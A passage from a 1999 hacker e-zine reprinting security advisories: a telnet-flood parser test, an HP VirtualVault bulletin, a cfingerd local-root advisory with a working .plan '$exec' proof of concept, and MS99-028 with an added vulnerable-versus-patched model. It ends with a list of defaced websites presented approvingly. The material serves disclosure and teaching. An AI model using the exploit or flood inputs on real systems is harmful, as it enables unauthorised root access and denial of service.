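            } else if (b >= TN_WILL && b <= TN_DONT) {
                c->commands++;
                c->negotiations++;
                c->state = S_OPT;           /* option byte follows */
            } else if (b == TN_SB) {
                c->commands++;
                c->state = S_SB;
            } else {                        /* NOP, GA, AYT, ...: two bytes */
                c->commands++;
                c->state = S_DATA;
            }
            break;
        case S_OPT:
            c->state = S_DATA;              /* option number consumed */
            if (c->negotiations > c->budget)
                return -1;
            break;
        case S_SB:
            if (b == TN_IAC) c->state = S_SB_IAC;
            break;
        case S_SB_IAC:
            if (b == TN_SE) c->state = S_DATA;
            else c->state = S_SB;           /* IAC IAC inside SB, or junk */
            break;
        }
    }
    return data;
}

/* Replay `pattern` `reps` times into a fresh connection with the given
 * budget; returns the result of the last tn_feed() call (-1 if dropped). */
long tn_replay(const unsigned char *pattern, size_t plen, int reps,
               unsigned long budget, unsigned long *negotiations_out)
{
    struct tn_conn c;
    long r = 0;
    int k;

    tn_init(&c, budget);
    for (k = 0; k < reps && r >= 0; k++)
        r = tn_feed(&c, pattern, plen);
    if (negotiations_out)
        *negotiations_out = c.negotiations;
    return r;
}

/* constructed inputs: what hiperbomb writes, and a well-formed IAC flood */
const unsigned char HIPERBOMB_TRIPLE[3] = { 254, 36, 185 };
const unsigned char DONT36[3] = { TN_IAC, TN_DONT, 36 };

int main(void)
{
    unsigned long n;

    printf("hiperbomb triple x60000: last result %ld (3 = plain data, no IAC seen)\n",
           tn_replay(HIPERBOMB_TRIPLE, 3, 60000, 32, &n));
    tn_replay(DONT36, 3, 60000, 32, &n);
    printf("IAC DONT 36 flood: peer dropped after %lu negotiations\n", n);
    return 0;
}
```

A real daemon would call tn_feed() on every read and close the socket the first time it returns -1; the budget only has to be larger than the handful of options a legitimate client negotiates at login.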
=============================================================================== o HP Electronic Support Center World Wide Web Service --------------------------------------------------- If you subscribed through the HP Electronic Support Center and would like to be REMOVED from this mailing list, access the HP Electronic Support Center on the World Wide Web at: http://europe-support.external.hp.com Login using your HP Electronic Support Center User ID and Password. Then select Support Information Digests. You may then unsubscribe from the appropriate digest. =============================================================================== Digest Name: Daily Security Bulletins Digest Created: Thu Aug 12 15:00:02 METDST 1999 Table of Contents: Document ID Title --------------- ----------- HPSBUX9906-098 Security Vulnerability in VVOS NES The documents are listed below. ------------------------------------------------------------------------------- Document ID: HPSBUX9906-098 Date Loaded: 19990811 Title: Security Vulnerability in VVOS NES --------------------------------------------------------------------------- **REVISED01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00098, 10 June 99 Last Revised: 11 August 1999 --------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: Netscape Enterprise Server cannot correctly process some URL's. 
PLATFORM: HP9000 Series 700/800 running:
          HP-UX 10.24 (VVOS) with VirtualVault A.02.00
          HP-UX 10.24 (VVOS) with VirtualVault A.03.00
          HP-UX 10.24 (VVOS) with VirtualVault A.03.01
          HP-UX 10.24 (VVOS) with VirtualVault A.03.50

DAMAGE: Web Server cannot correctly process some URLs.

SOLUTION: Apply the appropriate patches to correct the problem:

**REVISED01**

Both HP-UX 10.24 with VirtualVault A.02.00 US/Canada, and
     HP-UX 10.24 with VirtualVault A.02.00 International:
          PHCO_18615 libsecalarm cumulative patch
                     Please note this patch has dependencies.
  ----->> PHSS_19389 VirtualVault:2.00:NES:NSAPI

Both HP-UX 10.24 with VirtualVault A.03.00 US/Canada, and
     HP-UX 10.24 with VirtualVault A.03.00 International:
          PHCO_18615 libsecalarm cumulative patch
                     Please note this patch has dependencies.
  ----->> PHSS_19388 VirtualVault:3.00:NES:NSAPI

Both HP-UX 10.24 with VirtualVault A.03.01 US/Canada, and
     HP-UX 10.24 with VirtualVault A.03.01 International:
          PHCO_18615 libsecalarm cumulative patch
                     Please note this patch has dependencies.
  ----->> PHSS_19387 VirtualVault:3.01:NES:NSAPI

Both HP-UX 10.24 with VirtualVault A.03.50 US/Canada, and
     HP-UX 10.24 with VirtualVault A.03.50 International:
          PHCO_18615 libsecalarm cumulative patch
                     Please note this patch has dependencies.
  ----->> PHSS_19376 VirtualVault:3.50:NES:NSAPI

AVAILABILITY: All patches are available now.

CHANGE SUMMARY: Defects in previous patches discovered.
-----------------------------------------------------------------------
I.
   A. Background

   A recent bugtraq posting contained some inaccurate information regarding Hewlett-Packard Company's VirtualVault Operating System. This problem is not TGA nor TGP related; further, VVOS does not have a B1 or B2 level of certification.

   Under certain conditions, Netscape Enterprise Server (NES) fails to properly process web requests. This activity has been observed in the NES bundled with Praesidium VirtualVault releases A.02.00, A.03.00, A.03.01 and A.03.50.

   B.
Fixing the problem This problem can be completely eliminated by applying the recommended patches mentioned above. It can be resolved temporarily by commenting out or removing the "vault-auth-log" AddLog line from the Netscape Enterprise Server's obj.conf file. Upon patching the system, automatic reboot is performed. The affected filesets are: VaultNES.NES-VAULT VaultTS.INES-COMMON. C. To subscribe to automatically receive future NEW HP Security Bulletins or access the HP Electronic Support Center, use your browser to get to our ESC web page at: http://us-support.external.hp.com (for non-European locations), or http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID/password assigned to you. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review Security bulletins already released-, click on the "Search Technical Knowledge Database." To -retrieve patches-, click on "Individual Patches" and select appropriate release and locate with the patch identifier (ID). To -browse the HP Security Bulletin Archive-, select the link at the bottom of the page once in the "Support Information Digests". To -view the Security Patch Matrix-, (updated daily) which categorizes security patches by platform/OS release, and by bulletin topic, go to the archive (above) and follow the links. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. 
Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party.
________________________________________________________________________
-----End of Document ID: HPSBUX9906-098--------------------------------

@HWA

76.0 cfingerd exploit
     ~~~~~~~~~~~~~~~~

Bugtraq Security Advisory
=========================

A serious bug in cfingerd before version 1.4.0 has been reported. It is present in all versions of cfingerd from 1.2.0 up to any version of 1.3.2. If configured accordingly this bug enables any local user to execute random programs with root privileges.

Although I haven't been quite verbose with development of cfingerd, Ken Hollis (the original author) has handed maintainership over to me a while ago. I did some development and fixed some security related bugs, but never made an official release. This is done now.

Affected systems
----------------

All systems running a version of cfingerd beginning with version 1.2.0 and before version 1.4.0 are affected.

You are safe if you have disabled ALLOW_EXECUTION in your cfingerd.conf file in section "internal_config", i.e. that file contains a line "-ALLOW_EXECUTION". This is the default configuration of this package. If you use the default cfingerd.conf file as shipped with the distribution you are safe. You should still upgrade.

Recommended action
------------------

1st Immediately turn off ALLOW_EXECUTION in your cfingerd.conf file.
2nd Upgrade to the most recent version of cfingerd 1.4.0 to be found at the primary site
    ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/ or
    ftp://metalab.unc.edu/pub/Linux/system/network/finger/ .

Exploit
-------

The exploit is quite simple. Thanks go to Tadek Knapik who has informed me.

You need to add

    $exec /tmp/relinq

to your ~/.plan file. Then compile the following relinq.c file in /tmp:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* run by cfingerd via the $exec line in ~/.plan; if the daemon has not
 * dropped root, the setre*id() calls succeed and the ids print as 0 */
int main(void)
{
    printf("Root exploit test\n");
    setregid(0, 0);
    setreuid(0, 0);
    printf("User: %d, group: %d.\n", (int)getuid(), (int)getgid());
    return 0;
}

Checksum
--------

File: ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/cfingerd-1.4.0.tar.gz
MD5sum: dcc25e89ba1dad6497365429b1db2909

Regards,

	Joey

--
Experience is something you don't get until just after you need it.

@HWA

77.0 Microsoft Advisory: Patch Available for "Terminal Server Connection Request Flooding"
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox.

********************************

Microsoft Security Bulletin (MS99-028)
--------------------------------------

Patch Available for "Terminal Server Connection Request Flooding" Vulnerability

Originally Posted: August 09, 1999

Summary
=======

Microsoft has released a patch that eliminates a vulnerability that could pose a denial-of-service threat to Microsoft(r) Windows NT(r) Terminal Servers. Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-028faq.asp

Issue
=====

When a request to open a new terminal connection is received by a Terminal Server, the server undertakes a resource-intensive series of operations to prepare for the connection. It does this before authenticating the request.
This would allow an attacker to mount a denial of service attack by levying a large number of bogus connection requests and consuming all memory on the Terminal Server. This vulnerability could be exploited remotely if connection requests are not filtered. In extreme cases, the server could crash in the face of such an attack; in other cases, normal processing would return when the attack ceased. The patch works by causing the server to require authentication before processing the connection request. Affected Software Versions ========================== - Microsoft Windows NT Server 4.0, Terminal Server Edition Patch Availability ================== - Microsoft Windows NT Server 4.0, Terminal Server Edition: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes /usa/NT40tse/hotfixes-postSP4/Flood-fix/ NOTE: Line breaks have been added to the above URL for readability. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-028: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-028faq.asp. - Microsoft Knowledge Base (KB) article Q238600, Multiple Connection Requests Promote Denial of Service Attack, http://support.microsoft.com/support/kb/articles/q238/6/00.asp. (Note: It may take 24 hours from the original posting of this bulletin for the KB article to be visible.) - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp. Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Acknowledgments =============== Microsoft acknowledges the ISS X-force (http://www.iss.net) for discovering this vulnerability and working with us to alert customers about it. Revisions ========= - August 09, 1999: Bulletin Created. 
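- Ed: the bug class in MS99-028 is ordering, not a parsing flaw: the server spends memory on a caller it has not yet identified, so the caller never needs credentials to exhaust it, and the fix is simply to check identity first. The following is an added example written for this issue, not Microsoft's or Terminal Server's code; it models a connection broker in miniature with the vulnerable ordering beside the patched one. The per-session cost, the session cap and the shared-secret "credential" are assumptions standing in for RDP's real setup work and authentication; a NULL token stands for a client that opens a request and never completes the handshake.

```c
/* Resource allocation before vs. after authentication: the ordering bug
 * MS99-028 describes, modelled in miniature. Added illustration for HWA,
 * not Terminal Server code; sizes, cap and the credential check are assumed. */
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define SESSION_BYTES 16384      /* assumed cost of "preparing" one connection */
#define MAX_SESSIONS  1024       /* assumed point at which "all memory" is gone */

struct server {
    const char *secret;          /* stands in for real credential checking */
    void *sessions[MAX_SESSIONS];
    unsigned nsessions;          /* sessions holding memory right now */
    unsigned rejected;           /* requests turned away for bad credentials */
};

void server_init(struct server *sv, const char *secret)
{
    memset(sv, 0, sizeof *sv);
    sv->secret = secret;
}

void server_free_all(struct server *sv)
{
    unsigned i;
    for (i = 0; i < sv->nsessions; i++)
        free(sv->sessions[i]);
    sv->nsessions = 0;
}

size_t server_bytes_held(const struct server *sv)
{
    return (size_t)sv->nsessions * SESSION_BYTES;
}

static int credentials_ok(const struct server *sv, const char *token)
{
    return token != NULL && strcmp(token, sv->secret) == 0;
}

/* allocate and park the session state; it stays until the handshake completes
 * or times out, and a bogus client never completes it */
static int prepare_session(struct server *sv)
{
    void *s;
    if (sv->nsessions >= MAX_SESSIONS)
        return -1;                       /* nothing left for anyone */
    s = calloc(1, SESSION_BYTES);
    if (s == NULL)
        return -1;
    sv->sessions[sv->nsessions++] = s;
    return 0;
}

/* Vulnerable ordering: expensive preparation first, identity second.
 * Every anonymous request costs the server SESSION_BYTES. Returns 0 when a
 * session was set up and the caller authenticated, 1 when the caller was
 * rejected (session already parked), -1 when resources are exhausted. */
int connect_vulnerable(struct server *sv, const char *token)
{
    if (prepare_session(sv) < 0)
        return -1;
    if (!credentials_ok(sv, token)) {
        sv->rejected++;
        return 1;
    }
    return 0;
}

/* Patched ordering: nothing is allocated until the requester proves itself,
 * so an anonymous request costs one string compare. Same return codes. */
int connect_patched(struct server *sv, const char *token)
{
    if (!credentials_ok(sv, token)) {
        sv->rejected++;
        return 1;
    }
    if (prepare_session(sv) < 0)
        return -1;
    return 0;
}

/* Send `bogus` anonymous requests, then one legitimate user; returns the
 * legitimate user's result code (0 served, -1 refused for lack of memory). */
int flood(int (*connect_fn)(struct server *, const char *),
          struct server *sv, unsigned bogus)
{
    unsigned i;
    for (i = 0; i < bogus; i++)
        connect_fn(sv, NULL);
    return connect_fn(sv, sv->secret);
}

int main(void)
{
    struct server v, p;

    server_init(&v, "s3cret");
    server_init(&p, "s3cret");
    printf("vulnerable: legit user result %d, %zu bytes held\n",
           flood(connect_vulnerable, &v, MAX_SESSIONS), server_bytes_held(&v));
    printf("patched:    legit user result %d, %zu bytes held\n",
           flood(connect_patched, &p, MAX_SESSIONS), server_bytes_held(&p));
    server_free_all(&v);
    server_free_all(&p);
    return 0;
}
```

The same rule generalises beyond Terminal Server: any handshake that allocates per-request state before the peer has proven anything (TCP SYN backlogs, TLS session setup, login prompts that fork) needs either authentication first or a hard per-source cap on unauthenticated state.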
-------------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsors, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD!
in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! ............

How many Windows programmers does it take to change a light bulb?
472, one to write WinGetLightBulbHandle, one to write WinQueryStatusLightBulb, one to write WinGetLightSwitchHandle.....

How many managers does it take to change a light bulb?
"We've formed a task force to study the problem and why light bulbs burn out, and figure out what, exactly, we, as supervisors, can do to make the bulbs work smarter, not harder."

How many tech support people does it take to change a light bulb?
"We have an exact copy of the light bulb here and it seems to be working fine. Can you tell me what kind of system you have? Okay, now exactly how dark is it? Okay, there could be four or five things wrong - have you tried the switch?"

How many Microsoft technicians does it take to change a light bulb?
Three, two to hold the ladder and one to screw the bulb into the tap.

How many Microsoft technicians does it take to change a light bulb?
Eight: one to work the bulb and seven to make sure that Microsoft gets $2 for every light bulb ever changed anywhere in the world.

How many Microsoft engineers does it take to change a light bulb?
None, Bill Gates will just redefine MSDarkness(TM) as the new industry standard.

How many Apple employees does it take to change a light bulb?
7, one to change the bulb and six to design the T-Shirt.

How many Apple programmers does it take to change a light bulb?
None, the light bulb will be obsolete in six months anyway.

How many testers does it take to change a light bulb?
We just noticed that it was dark, we don't actually fix the problem.

How many developers does it take to change a light bulb?
"The light bulb works fine on the system in my office."
How many C++ programmers does it take to change a light bulb?
"You're still thinking procedurally. A properly designed light bulb object would inherit a change method from a generic light bulb class, so all you'd have to do is send a light bulb change message."

@HWA

SITE.1 http://sik.kuntz.org/photon/

Pho's page, good info on OS fingerprinting can be found here, page recently updated with new scanning techniques added...check it out.

@HWA

H.W Hacked websites
    ~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while, for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Thursday Rumours; contributed by Magnum 351

In the last 48 hours numerous underground sites hosted on free internet sites like Zoom, Tripod, GeoCities, AngelFire, and others have disappeared. It would appear that about forty of these sites have been the victim of anonymous emails to the administrators of these systems. It is not known who is targeting these sites for removal but some feel it is the work of one person who is attempting to remove the competition.

Latest cracked pages courtesy of attrition.org

[99.08.21] NT [HiP] duno.com (members.duno.com)
[99.08.21] So [bl0w team] Small World Software (www.smallworld.com)
[99.08.21] So [mozy] Satelindo (ID) (www.satelindo.co.id)
[99.08.20] Li [HFH] HAQ (www.haq.nu)

Hacked: http://www.nailed.com
By: doofoo
Mirror: http://www.attrition.org/mirror/attrition/com/www.nailed.com/
OS: FreeBSD

Hacked: http://sgss.com
By: DW
Mirror: http://www.attrition.org/mirror/attrition/com/sgss.com/
OS: NT

*Hacked: http://www.ucam.ac.ma
By: Level Seven
Mirror: http://www.attrition.org/mirror/attrition/ma/www.ucam.ac.ma
OS: Linux

*This is the first Web site to be defaced in the country of Morocco.

Hacked: http://www.ravencomp.ie
By: Unknown
Mirror: http://www.attrition.org/mirror/attrition/ie/www.ravencomp.ie/
OS: Irix

Hacked: http://www.ddd.hu
By: 139_r00ted
Mirror: http://www.attrition.org/mirror/attrition/hu/www.ddd.hu
OS: NT

Hacked: http://www.arodnet.com
By: Infinity
Mirror: http://www.attrition.org/mirror/attrition/com/www.arodnet.com/
OS: Solaris

Hacked: http://lanpc11.ilf.dtu.dk
By: Elfoscuro
Mirror: http://www.attrition.org/mirror/attrition/dk/lanpc11.ilf.dtu.dk/
OS: NT

#2 Lyrikal (www.lyrikal.com)
Ford Gimsa Automotriz (www.fordgimsa.com.mx)
Distribuidora Monterrey Comisionistas S.A. de C.V. (www.dimocom.com.mx)
SubmitMaster (www.submitmaster.net)
Illinois Natural History Survey (nuclear.hazard.uiuc.edu)
God Hates Fags (www.godhatesfags.com)
Now TV (www.nowtv.com)
Symbiosis Centre for Management and Human Resource Development (www.scmhrd.edu)
ABC Network (www.abc.com)
ActiveZone (SG) (www.activezone.com.sg)
Professor J. C. Sprott, Physics, University of Wisconsin (sprott.physics.wisc.edu)
#2 Spartanburg County Public Libraries (www.spt.lib.sc.us)
#1 Spartanburg County Public Libraries (www.spt.lib.sc.us)
Fat Kid (www.fatkid.net)
FX Interactive (www.fxnetwork.com)
Sky Radio (www.sky-radio.com)

Last Updated: 08/19/99 at 12:15

Pet Pro (www.pet-pro.com)
NetSouth (www.netsouth.net)
Trousers (www.trousers.org)
SOS (www.s-o-s.org)
Jailed (www.jailed.com)
Iron Dragon (www.iron-dragon.com)
Texas Community Database (www.community.tded.state.tx.us)
Association of Centers for Engineering and Automation (www.acea.neva.ru)
Vermont Business Assistance Network (www.dca.state.vt.us)
Lebanon High School, New Hampshire (www.lebanon.k12.nh.us)

Hacked: http://www.trousers.org
By: CPW
Mirror: http://www.attrition.org/mirror/attrition/org/www.trousers.org

Hacked: http://www.riddleware.com
By: Dr Nuker of the Pakistan Hacker Club
Mirror: http://www.attrition.org/mirror/attrition/com/www.riddleware.com/
OS: Solaris

Hacked: http://pepita.ead.anl.gov/
By: GEZONDHEID
Mirror: http://www.attrition.org/mirror/attrition/gov/pepita.ead.anl.gov/

and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Columbia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it.
@HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]